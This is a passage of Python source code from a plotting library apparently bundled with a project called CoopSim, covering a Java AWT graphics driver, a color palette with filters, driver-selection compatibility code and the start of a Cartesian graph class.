for x in range(0,16,4):
for y in range(0,16,4):
gr.fillRect(x, y, 2, 2)
else: raise ValueError("'pattern' must be 'solid' or 'patternA', " + \
"'patternB', 'patternC' !")
self.paint = awt.TexturePaint(self.pattern, awt.Rectangle(16,16))
def changeGfx(self, awtObject):
"""Change the awt object (either image or awt component)"""
self.awtObject = awtObject
self.graphics = self.awtObject.getGraphics()
self._updateStroke()
self.resizedGfx()
self.reset()
def resizedGfx(self):
self.w = self.awtObject.getWidth()
self.h = self.awtObject.getHeight()
def getSize(self):
return self.w, self.h
def getResolution(self):
return 100
def setColor(self, rgbTuple):
self.color = rgbTuple
#self.graphics.setColor(awt.Color(*rgbTuple))
awtColor = awt.Color(rgbTuple[0], rgbTuple[1], rgbTuple[2])
self.graphics.setPaint(awtColor)
self.graphics.setColor(awtColor)
self._updatePaint()
def setLineWidth(self, width):
self.lineWidth = width
if width == Gfx.THIN: self.stroke_width = 1.0
elif width == Gfx.MEDIUM: self.stroke_width = 2.0
elif width == Gfx.THICK: self.stroke_width = 3.0
else: raise ValueError("'thickness' must be 'thin', 'medium' or 'thick' !")
self._updateStroke()
def setLinePattern(self, pattern):
self.linePattern = pattern
if pattern == Gfx.CONTINUOUS:
self.stroke_dash = [1.0]
elif pattern == Gfx.DASHED:
self.stroke_dash = [5.0,5.0]
elif pattern == Gfx.DOTTED:
self.stroke_dash = [2.0, 2.0]
else: raise ValueError("'pattern' must be 'continuous', " + \
"'dashed' or 'dotted' !")
self._updateStroke()
def setFillPattern(self, pattern):
self.fillPattern = pattern
self._updatePaint()
def setFont(self, ftype, size, weight):
self.fontType = ftype
self.fontSize = size
self.fontWeight = weight
if ftype == Gfx.SANS: ff = "SansSerif"
elif ftype == Gfx.SERIF: ff = "Serif"
elif ftype == Gfx.FIXED: ff = "Monospaced"
else:
raise ValueError("'type' must be 'sans', 'serif' or 'fixed' !")
if size == Gfx.SMALL: fsize = 10
elif size == Gfx.NORMAL: fsize = 14
elif size == Gfx.LARGE: fsize = 18
else:
raise ValueError("'size' must be 'small', 'normal' or 'large' !")
self.fsize = fsize
fst = 0
if "i" in weight: fst |= awt.Font.ITALIC
elif "b" in weight: fst |= awt.Font.BOLD
self.graphics.setFont(awt.Font(ff, fst, fsize))
def getTextSize(self, text):
return (len(text) * self.fsize*2/3, self.fsize)
# very inexact!
def drawLine(self, x1, y1, x2, y2):
self.graphics.drawLine(x1, self.h-y1-1, x2, self.h-y2-1)
def drawPoly(self, array):
xpoints = [x for x,y in array]
ypoints = [self.h-y-1 for x,y in array]
self.graphics.drawPolyline(xpoints, ypoints, len(array))
def drawRect(self, x, y, w, h):
self.graphics.drawRect(x,self.h-y-h,w-1,h-1)
def fillRect(self, x, y, w, h):
self.graphics.setPaint(self.paint)
self.graphics.fillRect(x,self.h-y-h,w,h)
self.graphics.setPaint(awt.Color(self.color[0], self.color[1], self.color[2]))
def fillPoly(self, array):
if len(array) == 0: return
xpoints = [x for x,y in array]
ypoints = [self.h-y-1 for x,y in array]
self.graphics.setPaint(self.paint)
self.graphics.fillPolygon(xpoints, ypoints, len(array))
self.graphics.setPaint(self.paint)
# polygon = awt.Polygon(xpoints, ypoints, len(array))
#polygon = awt.Polygon()
#for i in range(len(array)-1):
# x,y = array[i]
# print x, y
# polygon.addPoint(x, self.h-y-1)
#self.graphics.fillPolygon(polygon)
def writeStr(self, x, y, str, rotationAngle=0.0):
w,h = self.getTextSize(str)
if rotationAngle == 0.0:
self.graphics.drawString(str, x, self.h-y)
else:
af = awt.geom.AffineTransform()
theta = (360.0-rotationAngle)*math.pi/180.0
af.rotate(theta, x, self.h-y)
saveAT = self.graphics.getTransform()
self.graphics.setTransform(af)
self.graphics.drawString(str, x, self.h-y)
self.graphics.setTransform(saveAT)
# dcfg = self.graphics.getDeviceConfiguration()
# image = dcfg.createCompatibleImage(w, h)
# g = image.getGraphics()
# g.setFont(awt.Font(self.ff, self.fst, self.fsize))
# g.drawString(str, 0, h*5/6)
# a = rotationAngle / 180.0 * math.pi
# da = math.atan2(h,0)-a
# dw = int(h*math.cos(da)+0.5)
# dh = int(h*math.sin(da)+0.5)-h
# for dy in range(h):
# for dx in range(w):
# if (image.getRGB(dx, dy) & 0x00FFFFFF) != 0:
# r = math.sqrt(dx**2+dy**2)
# da = math.atan2(dy,dx) - a
# xx = int(r * math.cos(da)+0.5)
# yy = int(r * math.sin(da)+0.5)
# self.graphics.drawLine(x+xx-dw, self.h-y-h-1+yy-dh,
# x+xx-dw, self.h-y-h-1+yy-dh)
########################################################################
#
# class Window
#
########################################################################
myCanvas = None
myApplet = None
class Canvas(awt.Canvas):
def __init__(self):
self.win = None
def setWin(self, win):
self.win = win
def paint(self, g):
if self.win != None: self.win.refresh()
class Applet(applet.Applet):
def init(self):
self.setLayout(awt.BorderLayout())
self.panel = awt.Panel()
self.panel.setLayout(awt.BorderLayout())
self.canvas = Canvas()
self.panel.add(self.canvas)
self.add(self.panel)
class Window(Driver, Gfx.Window):
def __init__(self, size=(640,480), title="awtGraph"):
global myCanvas, myApplet
if myCanvas == None:
if myApplet == None:
myApplet = Applet()
pawt.test(myApplet, name=title, size=(size[0]+8,size[1]+30))
myCanvas = myApplet.canvas
dcfg = myCanvas.getGraphics().getDeviceConfiguration()
self.image = dcfg.createCompatibleImage(size[0], size[1])
Driver.__init__(self, self.image)
if isinstance(myCanvas, Canvas): myCanvas.setWin(self)
def refresh(self):
myCanvas.getGraphics().drawImage(self.image, None, 0, 0)
def quit(self):
pass
def waitUntilClosed(self):
self.refresh()
########################################################################
#
# Test
#
########################################################################
if __name__ == "__main__":
import systemTest
systemTest.Test_awtGfx()
```
#### File: CoopSim/PyPlotter/Colors.py
```python
try:
from Compatibility import *
except ImportError:
from . import Compatibility
globals().update(Compatibility.__dict__)
########################################################################
#
# colors
#
########################################################################
##~ BLACK = (0.0, 0.0, 0.0)
##~ WHITE = (1.0, 1.0, 1.0)
##~ RED = (1.0, 0.0, 0.0)
##~ GREEN = (0.0, 1.0, 0.0)
##~ BLUE = (0.0, 0.0, 1.0)
##~ YELLOW = (1.0, 1.0, 0.0)
##~ TURKEY = (0.0, 1.0, 1.0)
##~ PINK = (1.0, 0.0, 1.0)
colors=(
(0.00,0.00,0.50), (1.00,1.00,0.00), (0.33,1.00,1.00), (1.00,0.00,1.00),
(0.00,1.00,0.00), (1.00,0.00,0.00), (1.00,0.67,0.67), (0.40,0.40,0.00),
(0.33,0.33,1.00), (0.00,0.60,0.60), (0.40,1.00,0.40), (0.60,0.00,0.40),
(0.50,0.50,0.50), (1.00,0.50,0.00), (0.00,0.00,1.00), (0.67,0.67,1.00),
(0.00,0.20,0.00), (1.00,0.20,0.40), (0.60,0.80,0.00), (0.50,0.00,0.00),
(0.00,1.00,0.50), (0.80,1.00,0.80), (0.00,0.67,1.00), (0.00,0.60,0.20),
(0.60,0.00,0.80), (0.80,1.00,0.40), (1.00,0.40,1.00), (0.20,0.00,0.20),
(1.00,0.80,1.00), (0.00,1.00,1.00), (0.00,0.33,1.00), (0.33,0.00,1.00),
(0.33,0.67,1.00), (0.33,1.00,0.00), (0.67,0.33,1.00), (1.00,0.67,0.33),
(1.00,0.00,0.67), (0.60,0.80,0.60), (0.80,0.40,0.60), (0.40,0.20,0.60),
(0.20,0.40,0.40), (0.80,0.40,0.20), (0.33,0.67,0.33), (0.33,0.67,0.67),
(0.67,0.67,0.33), (0.20,0.60,0.00), (0.40,0.20,0.20), (0.60,1.00,0.20),
(0.80,0.00,0.20), (0.80,0.20,0.00), (1.00,1.00,0.60), (0.00,0.33,0.67),
(0.80,0.20,0.80), (0.33,1.00,0.67), (0.20,0.20,0.80), (0.60,1.00,1.00),
(0.80,0.60,0.80), (0.00,0.80,0.80), (0.20,1.00,0.20), (0.50,0.50,1.00),
(1.00,0.50,0.50), (0.80,0.80,0.20), (0.00,0.50,0.00), (0.20,0.00,0.60),
(0.00,0.20,0.40), (0.80,0.60,0.00), (0.00,0.80,0.40), (0.40,0.40,0.80),
(1.00,0.33,0.67), (1.00,0.00,0.33), (1.00,1.00,0.33), (0.67,0.00,1.00),
(0.67,1.00,0.00), (0.80,0.00,0.60), (0.40,0.80,0.80), (0.00,0.40,0.20),
(0.20,0.40,0.60), (0.40,0.00,0.40), (0.40,0.00,0.80), (0.40,0.80,0.00),
(0.60,0.20,0.20), (0.60,0.20,0.60), (0.60,0.40,0.00), (0.60,0.40,0.80),
(0.00,0.00,0.20), (0.00,0.20,0.20), (0.00,0.40,0.40), (0.00,1.00,0.20),
(0.20,0.00,0.00), (0.20,0.00,0.40), (0.20,0.20,0.00), (0.20,0.20,0.20),
(0.20,0.20,0.40), (0.20,0.40,0.00), (0.20,0.40,0.20), (0.20,0.80,0.40),
(0.20,0.80,0.80), (0.40,0.00,0.20), (0.40,0.20,0.00), (0.40,0.20,0.40),
(0.40,0.40,0.20), (0.40,0.80,0.20), (0.60,0.20,0.40), (0.80,0.40,0.40),
(1.00,0.20,0.20), (1.00,0.20,1.00), (0.00,0.00,0.80), (0.00,0.60,0.40),
(0.00,0.60,0.80), (0.00,0.80,0.00), (0.00,0.80,0.20), (0.00,0.80,0.60),
(0.00,1.00,0.80), (0.20,0.00,0.80), (0.20,0.20,0.60), (0.20,0.40,0.80),
(0.20,0.60,0.80), (0.20,0.80,0.00), (0.20,0.80,0.20), (0.20,0.80,0.60),
(0.20,1.00,0.40), (0.40,0.00,0.60), (0.40,0.20,0.80), (0.40,0.60,0.00),
(0.40,1.00,0.20), (0.60,0.00,0.20), (0.60,0.00,0.60), (0.60,0.20,0.00),
(0.60,0.20,0.80), (0.60,0.40,0.20), (0.60,0.60,0.00), (0.60,0.60,0.80),
(0.60,0.80,0.20), (0.60,0.80,0.80), (0.60,1.00,0.40), (0.60,1.00,0.60),
(0.60,1.00,0.80), (0.80,0.00,0.00), (0.80,0.00,0.40), (0.80,0.00,0.80),
(0.80,0.20,0.20), (0.80,0.20,0.40), (0.80,0.20,0.60), (0.80,0.40,0.00),
(0.80,0.40,0.80), (0.80,0.60,0.20), (0.80,0.60,0.60), (0.80,0.80,0.00),
(0.80,0.80,0.40), (0.80,0.80,0.60), (0.80,0.80,0.80), (0.80,1.00,0.20),
(0.80,1.00,0.60), (0.80,1.00,1.00), (1.00,0.20,0.00), (1.00,0.40,0.20),
(1.00,0.60,1.00), (1.00,0.80,0.00), (0.20,0.60,0.20), (0.80,0.80,1.00),
(1.00,0.80,0.80), (0.00,0.20,0.80), (0.20,0.80,1.00), (0.20,1.00,0.80),
(0.80,0.20,1.00), (1.00,0.20,0.80), (1.00,0.80,0.20), (0.20,0.20,1.00),
(0.60,0.60,0.60), (0.60,0.40,0.60), (0.40,0.40,0.60), (0.60,0.40,0.40),
(0.40,0.40,0.40), (0.00,0.50,1.00), (0.50,0.00,1.00), (0.50,1.00,0.00),
(1.00,0.00,0.50), (0.40,0.80,0.40), (0.40,0.60,0.80), (0.40,0.80,0.60),
(0.60,0.80,0.40), (0.80,0.60,0.40), (0.20,0.60,0.40), (0.40,0.60,0.20),
(0.20,0.60,0.60), (0.60,0.60,0.20), (0.00,0.40,0.80), (0.40,0.80,1.00),
(0.40,1.00,0.80), (0.80,0.40,1.00), (1.00,0.40,0.80), (1.00,0.80,0.40),
(0.60,0.80,1.00), (0.80,0.60,1.00), (1.00,0.60,0.80), (1.00,0.80,0.60),
(1.00,0.33,0.33), (0.20,0.40,1.00), (0.40,0.20,1.00), (0.00,0.20,0.60),
(0.20,0.60,1.00), (0.20,1.00,0.60), (0.60,0.20,1.00), (1.00,0.20,0.60),
(1.00,0.60,0.20), (0.00,0.50,0.50), (0.50,0.00,0.50), (0.50,0.50,0.00),
(0.50,1.00,0.50), (0.00,0.00,0.67), (0.00,0.67,0.00), (0.00,1.00,0.67),
(0.67,0.00,0.00), (1.00,0.67,0.00), (0.00,0.80,1.00), (0.80,0.00,1.00),
(0.80,1.00,0.00), (1.00,0.00,0.80), (0.00,0.00,0.33), (0.00,0.33,0.00),
(0.00,1.00,0.33), (0.33,0.00,0.00), (1.00,0.33,0.00), (0.00,0.20,1.00),
(0.20,0.00,1.00), (0.20,1.00,0.00), (0.20,1.00,1.00), (1.00,0.00,0.20),
(1.00,1.00,0.20), (0.33,0.33,0.33), (0.33,0.33,0.67), (0.67,0.33,0.33),
(0.40,0.60,0.40), (0.67,0.33,0.67), (0.40,0.60,0.60), (0.60,0.60,0.40),
(0.67,0.67,0.67), (0.50,1.00,1.00), (1.00,1.00,0.50), (1.00,0.50,1.00),
(0.00,0.33,0.33), (0.33,0.00,0.33), (0.33,0.33,0.00), (0.33,1.00,0.33),
(0.40,0.40,1.00), (1.00,0.40,0.40), (0.00,0.67,0.33), (0.33,0.00,0.67),
(0.33,0.67,0.00), (0.67,0.00,0.33), (0.67,0.33,0.00), (0.67,1.00,0.33),
(0.00,0.40,0.60), (0.40,0.60,1.00), (0.40,1.00,0.60), (0.60,0.40,1.00),
(1.00,0.40,0.60), (1.00,0.60,0.40), (0.00,0.67,0.67), (0.67,0.00,0.67),
(0.67,0.67,0.00), (0.67,1.00,0.67), (0.60,0.60,1.00), (1.00,0.60,0.60),
(1.00,0.33,1.00), (0.00,0.00,0.40), (0.00,0.40,0.00), (0.00,0.40,1.00),
(0.00,1.00,0.40), (0.40,0.00,0.00), (0.40,0.00,1.00), (0.40,1.00,0.00),
(0.40,1.00,1.00), (1.00,0.00,0.40), (1.00,0.40,0.00), (1.00,1.00,0.40),
(0.67,1.00,1.00), (1.00,0.67,1.00), (1.00,1.00,0.67), (0.00,0.00,0.60),
(0.00,0.60,0.00), (0.00,0.60,1.00), (0.00,1.00,0.60), (0.60,0.00,0.00),
(0.60,0.00,1.00), (0.60,1.00,0.00), (1.00,0.00,0.60), (1.00,0.60,0.00)
)
########################################################################
#
# color filters
#
########################################################################
def RedFilter(c):
"""Returns True if color can be classified as a shade of red"""
if (c[0] > c[1]) and (c[0] > c[2]) and (c[1] == c[2]): return True
else: return False
def GreenFilter(c):
"""Returns True if color can be classified as a shade of green"""
if (c[1] > c[0]) and (c[1] > c[2]) and (c[0] == c[2]): return True
else: return False
def BlueFilter(c):
"""Returns True if color can be classified as a shade of blue"""
if (c[2] > c[1]) and (c[2] > c[0]) and (c[1] == c[0]): return True
else: return False
def YellowFilter(c):
"""Returns True if color can be classified as a shade of yellow"""
if (c[0] > c[2]) and (c[1] > c[2]) and (c[0] == c[1]): return True
else: return False
def PinkFilter(c):
"""Returns True if color can be classified as a shade of pink"""
if (c[0] > c[1]) and (c[2] > c[1]) and (c[2] == c[0]): return True
else: return False
def TurkeyFilter(c):
"""Returns True if color can be classified as a shade of turkey"""
if (c[2] > c[0]) and (c[1] > c[0]) and (c[2] == c[1]): return True
else: return False
```
#### File: CoopSim/PyPlotter/Compatibility.py
```python
try:
set
except NameError:
try:
import sets
except ImportError:
import altsets as sets
set = sets.Set
# had to be commented out in order to allow Python 3.0 compatibility
# sacrifices some backward compatibility (python 2.1?) though
#try:
# True, False
#except NameError:
# True, False = (0==0, 0!=0)
try:
object
except NameError:
class object:
pass
import sys
if sys.platform[:4] == "java" and sys.version[:3] == "2.2":
class object: # avoid problems with copy.deepcopy
pass
def GetDriver(check=["qtGfx", "gtkGfx", "wxGfx", "tkGfx", "awtGfx"]):
"""Get any available Gfx Driver."""
for wish in check:
if wish == "qtGfx":
try:
import qtGfx
return qtGfx
except ImportError:
try:
from . import qtGfx
return qtGfx
except ImportError:
pass
elif wish == "gtkGfx":
try:
import gtkGfx
return gtkGfx
except ImportError:
try:
from . import gtkGfx
return gtkGfx
except ImportError:
pass
elif wish == "wxGfx":
try:
import wxGfx
return wxGfx
except ImportError:
pass
elif wish == "tkGfx":
try:
import tkGfx
print("WARNING: tk is not fully supported by PyPlotter.\n"+\
"Use of wxPython or PyGTK2 is highly recoomended!\n\n")
return tkGfx
except ImportError:
try:
from . import tkGfx
return tkGfx
except ImportError:
pass
elif wish == "awtGfx":
try:
import awtGfx
return awtGfx
except ImportError:
pass
raise ImportError("Could not find a graphics drivers for PyPlotter!\n\n")
```
#### File: CoopSim/PyPlotter/Graph.py
```python
import copy
import math
import random
try:
from Compatibility import *
except ImportError:
from . import Compatibility
globals().update(Compatibility.__dict__)
try:
import Gfx
import Colors
import psGfx
except ImportError:
from . import Gfx, Colors, psGfx
########################################################################
#
# class CoordinateTransformer
#
########################################################################
class CoordinateTransformer(object):
"""Transforms virtual coordinates to screen (or printer) coordinates
Attributes (read only!):
vx1, vy1, vx2, vy1 - virtual coordinate range
sx1, sy1, sx2, sy2 - screen coordinate range
keepAspect - keep aspect ratio (boolean)
"""
def __init__(self, x1, y1, x2, y2, vx1=-1.0, vy1=-1.0,
vx2=1.0, vy2=1.0, keepAspectRatio=True):
"""Initialize coordinate transformer with sreen and virtual
coordinate range.
"""
self.x1 = vx1
self.y1 = vy1
self.x2 = vx2
self.y2 = vy2
self.keepAspect = keepAspectRatio
self.setScreen(x1, y1, x2, y2)
def setScreen(self, x1, y1, x2, y2):
"""Define the screen coordinates. Note that the direction is
always from bottom to top and from left to right. So, if the
origin of the screen is the upper left corner, y1 and y2 have
to be swapped.
"""
self.sx1 = x1
self.sy1 = y1
self.sx2 = x2
self.sy2 = y2
self.sw = x2 - x1
self.sh = y2 - y1
self.setRange(self.x1, self.y1, self.x2, self.y2)
def setRange(self, x1, y1, x2, y2):
"""Set the virtual coordinate range."""
self.x1 = float(x1)
self.y1 = float(y1)
self.x2 = float(x2)
self.y2 = float(y2)
self.w = self.x2 - self.x1
self.h = self.y2 - self.y1
self.xmult = self.sw / self.w
self.ymult = self.sh / self.h
self.dx = 0
self.dy = 0
if self.keepAspect:
sr = float(self.sw) / float(self.sh)
vr = self.w / self.h
if sr < vr:
self.ymult *= sr / vr
self.dy = round((self.sh - self.h * self.ymult) / 2.0)
elif sr > vr:
self.xmult *= vr / sr
self.dx = round((self.sw - self.w * self.xmult) / 2.0)
self.dx += (0.0 - x1) * self.xmult - (0 - self.sx1)
self.dy += (0.0 - y1) * self.ymult - (0 - self.sy1)
def keepAspectRatio(self, yesno):
"""boolean: Keep Aspect Ratio?"""
if yesno != self.keepAspect:
self.keepAspect = yesno
self.setRange(self.x1, self.y1, self.x2, self.y2)
def X(self, x):
"""Transform virtual x-coordinate to screen coortinate."""
return int(x * self.xmult + self.dx + 0.5)
def Y(self, y):
"""Transform virtual y-coordinate to screen coortinate."""
return int(y * self.ymult + self.dy + 0.5)
def transform(self, pointList):
"""Transform an array of (x,y)-tupels to screen coordinates."""
return [(self.X(p[0]), self.Y(p[1])) for p in pointList]
def invX(self, sx):
"""Transform a screen x-coordinate to a virtual coordinate."""
return float(sx - self.dx) / self.xmult
def invY(self, sy):
"""Transform a screen y-coordinate to a virtual coordinate."""
return float(sy - self.dy) / self.ymult
def inverse(self, pointList):
"""Retransform an array of (x,y)-tupels of screen coordinates
to virtual coordinates.
"""
return [(self.invX(p[0]), self.invY(p[1])) for p in pointList]
########################################################################
#
# class VirtualScreen
#
########################################################################
def screenRegion(gfx, region=(0.0, 0.0, 1.0, 1.0)):
"""(gfx, 4-tuple of floats) -> (4-tuple of ints)
Determine the absolute coordinates of a screen region from its
relative coordinates (coordinates from 0.0 to 1.0)
"""
w, h = gfx.getSize()
x1 = (w - 1) * region[0]
y1 = (h - 1) * region[1]
x2 = (w - 1) * region[2]
y2 = (h - 1) * region[3]
if type(w) == type(1):
x1 = int(x1 + 0.5)
y1 = int(y1 + 0.5)
x2 = int(x2 + 0.5)
y2 = int(y2 + 0.5)
return (x1, y1, x2, y2)
def relativeRegion(region, parentRegion):
"""(region, region) -> (region)
Create a region as part of another region. => region
"""
w = parentRegion[2] - parentRegion[0]
h = parentRegion[3] - parentRegion[1]
x1 = parentRegion[0] + w * region[0]
y1 = parentRegion[1] + h * region[1]
x2 = parentRegion[0] + w * region[2]
y2 = parentRegion[1] + h * region[3]
return (x1, y1, x2, y2)
REGION_FULLSCREEN = (0.0, 0.0, 1.0, 1.0)
REGION_FRAMED = (0.05, 0.05, 0.95, 0.95)
class VirtualScreen(object):
"""Uses a region of the graphics area as a virtual screen.
Attributes (read only!):
gfx - the graphics interface
region - 4-tuple of floats: the relative coordinates of the
screen region Ex: (0.,0.,1.,1.) == full screen
tr - the coordinate transformer
"""
def __init__(self, gfx, x1, y1, x2, y2, region, keepAspectRatio):
"""Occupies a region on gfx using coordinate range x1,y1 to x2,y2
"""
self.gfx = gfx
self.region = region
scr = self.screenRegion()
self.tr = CoordinateTransformer(scr[0], scr[1], scr[2], scr[3],
x1, y1, x2, y2,
keepAspectRatio)
def screenRegion(self):
"""Retruns the screen coordinates of the virual screen.
Determines the screen coordinates of the region covered by
the virtual screen."""
return screenRegion(self.gfx, self.region)
def adjustRange(self, x1, y1, x2, y2):
"""Adjusts the coordinate range."""
self.tr.setRange(x1, y1, x2, y2)
def adjustRegion(self, region):
"""Adjusts the region of the screen that is used."""
self.region = region
self.resizedGfx()
def resizedGfx(self):
"""Adjusts attributes after a resize of the graphics interface.
"""
scr = self.screenRegion()
self.tr.setScreen(scr[0], scr[1], scr[2], scr[3])
def changeGfx(self, gfx):
"""Use a new graphics interface from now on. Returns the old
graphics interface."""
oldGfx = self.gfx
self.gfx = gfx
self.resizedGfx()
return oldGfx
# ~ def redraw(self):
# ~ """Redraw the contents of the virtual screen.
# ~ The redraw method must always be called explicitly"""
# ~ pass # this is a dummy!
########################################################################
#
# class HardFramedScreen
#
########################################################################
class HardFramedScreen(VirtualScreen):
"""A virtual screen with a hard frame, i.e. a frame of which the
size is defined by screen coordinates (instead of region size or
virtual coordinates).
Attributes:
top, bottom, left, right - frame width on the respective side
sx1, sy1, sx2, sy2 - the screen coordinates of the full
screen (including the frame).
overlap - 4-tuple of integers, resembling
z-values of the top, bottom, left and right frame parts.
"""
def __init__(self, gfx, x1, y1, x2, y2, region,
top, bottom, left, right, keepAspect,
overlap=(1, 1, 0, 0)):
"""Initializes a VirtualScreen with a frame defined by 'top',
'bottom', 'left', 'right'
"""
self.top = top
self.bottom = bottom
self.left = left
self.right = right
self.overlap = overlap
VirtualScreen.__init__(self, gfx, x1, y1, x2, y2, region,
keepAspect)
def _setOverlap(self, overlap):
"""Changes the overlapping order of the side frames."""
self.overlap = overlap
def screenRegion(self):
scr = VirtualScreen.screenRegion(self)
self.sx1, self.sy1, self.sx2, self.sy2 = scr
return (scr[0] + self.left, scr[1] + self.bottom,
scr[2] - self.right, scr[3] - self.top)
def adjustFrame(self, top, bottom, left, right):
"""Changes the frame size."""
self.top = top
self.bottom = bottom
self.left = left
self.right = right
self.resizedGfx()
def innerFrame(self):
"""-> (sx1, sy1, sx2, sy2) screen coordinates of the inner
frame."""
return (self.sx1 + self.left, self.sy1 + self.bottom,
self.sx2 - self.right, self.sy2 - self.top)
def topFrame(self):
"""-> (sx1, sy1, sx2, sy2) screen coordinates of the top frame.
"""
if self.overlap[3] > self.overlap[0]:
sx2 = self.sx2 - self.right
else:
sx2 = self.sx2
if self.overlap[2] > self.overlap[0]:
sx1 = self.sx1 + self.left - 1
else:
sx1 = self.sx1
return (sx1, self.sy2 - self.top + 1, sx2, self.sy2)
def bottomFrame(self):
"""-> (sx1, sy1, sx2, sy2) screen coordinates of the bottom
frame."""
if self.overlap[3] > self.overlap[1]:
sx2 = self.sx2 - self.right
else:
sx2 = self.sx2
if self.overlap[2] > self.overlap[1]:
sx1 = self.sx1 + self.left - 1
else:
sx1 = self.sx1
return (sx1, self.sy1, sx2, self.sy1 + self.bottom - 1)
def leftFrame(self):
"""-> (sx1, sy1, sx2, sy2) screen coordinates of the left frame.
"""
if self.overlap[0] > self.overlap[2]:
sy2 = self.sy2 - self.top
else:
sy2 = self.sy2
if self.overlap[1] > self.overlap[2]:
sy1 = self.sy1 + self.bottom - 1
else:
sy1 = self.sy1
return (self.sx1, sy1, self.sx1 + self.left - 1, sy2)
def rightFrame(self):
"""-> (sx1, sy1, sx2, sy2) screen coordinates of the right frame.
"""
if self.overlap[0] > self.overlap[3]:
sy2 = self.sy2 - self.top
else:
sy2 = self.sy2
if self.overlap[1] > self.overlap[3]:
sy1 = self.sy1 + self.bottom - 1
else:
sy1 = self.sy1
return (self.sx2 - self.right + 1, sy1, self.sx2, sy2)
########################################################################
#
# class Cartesian
#
########################################################################
# Style Flags
AXISES, AXIS_DIVISION, FULL_GRID, LABELS, CAPTION, \
TITLE, SHUFFLE_DRAW, EVADE_DRAW, LOG_X, LOG_Y, \
KEEP_ASPECT, AUTO_ADJUST, AUTO_PEN = [2 ** i for i in range(13)]
DEFAULT_STYLE = TITLE | CAPTION | LABELS | FULL_GRID | AXISES | AUTO_ADJUST | AUTO_PEN
MASK_LAYOUT = LABELS | CAPTION | TITLE
MASK_GRAPHSTYLE = AXISES | AXIS_DIVISION | FULL_GRID | SHUFFLE_DRAW | EVADE_DRAW
MASK_RANGE_TYPE = KEEP_ASPECT | AUTO_ADJUST
MAGIC_TITLESIZE_FACTOR = 3
MAGIC_LABELSIZE_FACTOR = 3
MAGIC_CAPTIONLINE_FACTOR = 1.2
MAGIC_CAPTIONENTRY_EXTEND = 2
MAGIC_CPATIONENTRY_DIV = 6
MAGIC_CAPTIONENTRY_HSPACE = 2
MAGIC_CAPTIONSIZE_ADD = 1 # lines
LOG_BASE = 10
class AutoPen(Gfx.Pen):
def __init__(self):
Gfx.Pen.__init__(self)
self.lineWidth = Gfx.MEDIUM
class DontDrawPen(Gfx.Pen):
def __init__(self):
Gfx.Pen.__init__(self)
self.color = (1.0, 1.0, 1.0)
AUTO_GENERATE_PEN = AutoPen()
DONT_DRAW_PEN = DontDrawPen()
CAPTION_PEN = Gfx.Pen(color=Gfx.BLACK, fsize=Gfx.SMALL)
class AutoGfx(Gfx.nilDriver):
pass
AUTO_GFX = AutoGfx()
def bitsum(i):
"""-> cross sum of the bits of integer i"""
s = 0
k = 2 ** int(math.log(i, 2))
while k > 0:
s += k & i
k /= 2
return s
class Cartesian(HardFramedScreen):
"""Plots function values onto a coordinate plane.
Attributs (read only!):
x1,y1,x2,y2 - floats: coordinate Range
xaxis, yaxis- strings: axis descriptions
styleFlags - integer, interpreted as a bitfield of flags;
defines style of the graph. Possible flags:
AXIS, AXIS_DIVISION, FULL_GRID: Draw axises,
axis divisions and (or) a full grid,
LABEL, CAPTION, TITLE: draw axis labels, a
a caption with descriptions (generated from the pen
names) below the graph, a title above the graph.
SHUFFLE_DRAW, EVADE_DRAW: two different algorithms to
allow for the visibility of overlapping graphs
LOG_X, LOG_Y: use a logarithmic scale for the x or y
axis respectively.
KEEP_ASPECT: Keep the aspect ratio of the coordinates
AUTO_ADJUST: automatically adjust the range of the graph
when a point is added that falls outside the current
range.
stretchX, stretchY - stretch factor for lagrithmic scales
axisPen, labelPen, titlePen, captionPen, backgroundPen - pens
(sets of graphical attributes) for the respective elements
of the graph
pens - dictionary (indexed by name strings) of pens (see
mod. Pens) for graphs to be drawn onto the coordinate plane
values - dictionary (indexed by name strings) of lists of
value pairs (x,y) that define the graph associated with the
respective pen (identified by its name)
penOrder - list of pen names in drawing order
colorIndex - color index that points to the color to be fetched
next from Colors.color, when generating the color for an
AutoPen.
"""
def __init__(self, gfx, x1, y1, x2, y2,
title="Graph", xaxis="X", yaxis="Y",
styleFlags=DEFAULT_STYLE,
axisPen=Gfx.BLACK_PEN, labelPen=Gfx.BLACK_PEN,
titlePen=Gfx.BLACK_PEN, captionPen=Gfx.BLACK_PEN,
backgroundPen=Gfx.WHITE_PEN,
region=REGION_FULLSCREEN):
"""Initializes the graph using the graphics driver 'gfx'.
For the other parameters see doc string of class Cartesian.
"""
if isinstance(gfx, AutoGfx):
gfx = GetDriver().Window(title=title)
self.x1, self.x2 = x1, x2
self.y1, self.y2 = y1, y2
self.titleStr = title
self.xaxis, self.yaxis = xaxis, yaxis
self.styleFlags = styleFlags
self.axisPen, self.labelPen = axisPen, labelPen
self.titlePen, self.captionPen = titlePen, captionPen
self.backgroundPen = backgroundPen
self.pens = {}
self.values = {}
self.penOrder = []
self.colorIndex = 2 # set to 2, if you want to skipt that yellow pen!
self.dpi = gfx.getResolution()
self.top, self.bottom, self.left, self.right = 0, 0, 0, 0
self.gfx = gfx
self.region = region
self._assertRangeParameters()
self._calcStretchFactors()
top, bottom, left, right = self._xcalcFrame()
HardFramedScreen.__init__(self, gfx, self.x1, self.y1,
self.x2, self.y2, region,
top, bottom, left, right,
styleFlags & KEEP_ASPECT)
self.redraw()
def _maxCaptionEntrySize(self):
"""-> (w, h, th) Size of the biggest Caption Entry."""
sl = [self.gfx.getTextSize(name) for name in self.pens.keys()]
if sl == []:
sl.append(self.gfx.getTextSize("ABDFGabdfg"))
wl = [s[0] for s in sl]
hl = [s[1] for s in sl]
th = max(hl)
w = max(wl)
w += int(MAGIC_CAPTIONENTRY_EXTEND * th + 0.5)
w += MAGIC_CAPTIONENTRY_HSPACE * th
h = int(th * MAGIC_CAPTIONLINE_FACTOR + 0.5)
self._captionESTuple = (w, h, th)
return self._captionESTuple
def _captionLinesNColumns(self):
"""-> (l,c) number of caption lines and columns."""
w, h, th = self._captionESTuple
scr = screenRegion(self.gfx, self.region)
sw = scr[2] - scr[0] + 1
c = max(1, min(len(self.pens), sw / w))
l = max(1, (len(self.pens) + c - 1) / c)
self._captionLCTuple = (l, c)
return self._captionLCTuple
def _xcalcFrame(self):
"""Returns the screen coordinates (top, bottom, left, right) of
the frame.
"""
if self.styleFlags & TITLE:
self.gfx.applyPen(self.titlePen, Gfx.FONT)
th = self.gfx.getTextSize("0g")[1]
top = int(th * MAGIC_TITLESIZE_FACTOR + 0.5)
else:
top = 0
if self.styleFlags & LABELS:
self.gfx.applyPen(self.labelPen, Gfx.FONT)
